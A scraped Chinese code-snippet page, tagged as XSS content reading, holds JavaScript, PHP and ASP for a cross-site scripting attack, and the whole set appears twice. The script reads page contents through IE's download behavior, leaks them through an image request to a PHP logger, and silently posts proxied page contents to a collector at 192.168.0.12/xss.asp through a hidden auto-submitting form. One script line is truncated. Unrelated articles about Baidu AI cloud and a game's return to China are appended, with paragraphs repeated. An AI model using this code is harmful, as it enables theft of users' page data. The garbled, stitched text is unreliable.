相思资源网 Design By www.200059.com
js:
复制代码 代码如下:
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}
function GetData(source)
{
txt=escape(source);
getReaded(txt);
}
function getReaded(usr) {
var newimg = new Image();
newimg.src="/UploadFiles/2021-04-02/style.php?key=">}
php:
复制代码 代码如下:
<?php
header('Content-Type:text/html;charset=GB2312');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
fputs(fopen($file,'a+'),$_GET['key']);
?>
=================================================以下通用了===============
复制代码 代码如下:
<%
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
function PageWebProxy(xmlpath)
Dim i, re, Url, Html
Url = xmlpath
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
If Split(Url, "/")(2) = "club.isso.com.cn" Then
Html = Replace(Html, "%26amp;", "%26")
Else
Html = Replace(Html, "%26amp;", "&")
End If
Html = Replace(Html, "%26nbsp;", " ")
Html = Replace(Html, "%26lt;", "<")
Html = Replace(Html, "%26gt;", ">")
Html = Replace(Html, "%26quot;", """)
Html = Replace(Html, "%26copy;", "©")
Html = Replace(Html, "%26reg;", "®")
Html = Replace(Html, "%26raquo;", "»")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
' Html = Replace(Html, "%26", "")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
Html = re.Replace(Html,"?url=$1")
re.Pattern = "\?url=" & Url & "(#|javascript:)"
Html = re.Replace(Html,"$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html,"")
PageWebProxy=Html
End function
Function getHTTPPage(url)
Dim Http, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
Next
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.Send(theStr)
Else
Http.Open "GET", url, False
Http.Send()
End If
If Http.readystate<>4 then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responseBody
Response.End()
Else
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.responseBody
Response.Flush
Else
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = nothing
End Function
%>
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>")
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit style=display:none>");
document.writeln("<\/form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();
复制代码 代码如下:
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}
function GetData(source)
{
txt=escape(source);
getReaded(txt);
}
function getReaded(usr) {
var newimg = new Image();
newimg.src="/UploadFiles/2021-04-02/style.php?key=">}
php:
复制代码 代码如下:
<?php
header('Content-Type:text/html;charset=GB2312');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
fputs(fopen($file,'a+'),$_GET['key']);
?>
=================================================以下通用了===============
复制代码 代码如下:
<%
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
function PageWebProxy(xmlpath)
Dim i, re, Url, Html
Url = xmlpath
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
If Split(Url, "/")(2) = "club.isso.com.cn" Then
Html = Replace(Html, "%26amp;", "%26")
Else
Html = Replace(Html, "%26amp;", "&")
End If
Html = Replace(Html, "%26nbsp;", " ")
Html = Replace(Html, "%26lt;", "<")
Html = Replace(Html, "%26gt;", ">")
Html = Replace(Html, "%26quot;", """)
Html = Replace(Html, "%26copy;", "©")
Html = Replace(Html, "%26reg;", "®")
Html = Replace(Html, "%26raquo;", "»")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
' Html = Replace(Html, "%26", "")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
Html = re.Replace(Html,"?url=$1")
re.Pattern = "\?url=" & Url & "(#|javascript:)"
Html = re.Replace(Html,"$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html,"")
PageWebProxy=Html
End function
Function getHTTPPage(url)
Dim Http, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
Next
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.Send(theStr)
Else
Http.Open "GET", url, False
Http.Send()
End If
If Http.readystate<>4 then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responseBody
Response.End()
Else
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.responseBody
Response.Flush
Else
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = nothing
End Function
%>
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>")
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit style=display:none>");
document.writeln("<\/form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();
标签:
xss,内容读取
相思资源网 Design By www.200059.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
相思资源网 Design By www.200059.com
暂无xss文件页面内容读取(解决)的评论...
一口气升级7个大模型SaaS应用,百度智能云:突出一个“开箱即用” - 2024/11/19
这一波大模型产业落地浪潮里,不少企业其实处在 “干瞪眼“的状态。
一种情况是,很多大模型产品看得见却摸不着,在台上一个个遥遥领先——今天Sora技精四座,明天英伟达的机器人又赢得满堂彩,可是到了台下一问:啥时候能用上啊?答曰:遥遥无期。
另一种情况是,企业想用上大模型,却又难免瞻前顾后——既要考虑场景融合,又得兼顾安全性,还要考虑打通现有系统,再加上各种部署成本和繁琐的采购流程……最后只能拂袖:罢了,再等等吧。
这一波大模型产业落地浪潮里,不少企业其实处在 “干瞪眼“的状态。
一种情况是,很多大模型产品看得见却摸不着,在台上一个个遥遥领先——今天Sora技精四座,明天英伟达的机器人又赢得满堂彩,可是到了台下一问:啥时候能用上啊?答曰:遥遥无期。
另一种情况是,企业想用上大模型,却又难免瞻前顾后——既要考虑场景融合,又得兼顾安全性,还要考虑打通现有系统,再加上各种部署成本和繁琐的采购流程……最后只能拂袖:罢了,再等等吧。
稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!
昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。
这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。
而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?